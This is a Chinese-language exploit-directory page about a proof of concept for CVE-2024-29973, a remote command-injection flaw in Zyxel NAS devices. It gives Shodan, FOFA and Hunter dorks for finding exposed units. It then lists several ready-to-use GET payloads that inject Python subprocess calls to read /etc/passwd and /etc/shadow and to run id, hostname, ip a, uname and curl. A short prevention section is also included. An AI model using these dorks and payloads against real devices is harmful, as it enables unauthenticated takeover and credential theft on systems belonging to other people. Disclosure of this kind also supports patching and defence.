Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-29973 — CVE-2024-29973 的概念验证漏洞利用程序,针对 Zyxel NAS 设备中的远程命令注入漏洞,演示如何通过精心构造的 HTTP 请求执行任意命令。 | Kitploit
工具/GitHubGitHub/aerchy/cve-2024-29973
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubaerchy/cve-2024-29973

CVE-2024-29973

CVE-2024-29973 的概念验证漏洞利用程序,针对 Zyxel NAS 设备中的远程命令注入漏洞,演示如何通过精心构造的 HTTP 请求执行任意命令。

查看仓库
21131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-29973 - 远程命令注入漏洞

描述

CVE-2024-29973 是某些 Zyxel 网络设备中发现的一个严重漏洞。该漏洞允许未经身份验证的攻击者通过利用固件中输入验证机制不完善的问题,在目标设备上执行任意命令。攻击者可以向设备发送特制的 HTTP 请求,注入系统级命令,并可能完全控制该设备。

Dorks

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

工作原理

命令注入:该漏洞源于设备某个 Web 界面中输入清理不充分。此缺陷允许攻击者在 HTTP 请求的参数中附加操作系统命令。

漏洞利用示例:攻击者可以通过如下所示的 HTTP GET 请求注入命令,以执行任意代码:

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

影响:成功利用该漏洞可执行系统命令,可能导致远程控制设备、数据泄露或进一步危害网络。

预防措施

为降低与此漏洞相关的风险,请遵循以下步骤:

固件更新:确保所有 Zyxel 设备更新至最新固件版本。Zyxel 已发布修复此漏洞的补丁。请定期检查更新并及时应用。

网络分段:将易受攻击的设备与关键网络基础设施隔离。仅暴露必要的服务,并确保管理界面不对外公开。

防火墙配置:仅允许必要的服务进行入站和出站流量。阻止对 Zyxel 设备不必要的 HTTP 访问。

监控可疑活动:部署日志记录和监控工具,以便检测并告警异常行为,例如重复登录尝试或异常流量模式。

参考资料 国家漏洞数据库 - CVE-2024-29973 Zyxel 安全公告

图片

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
下载工具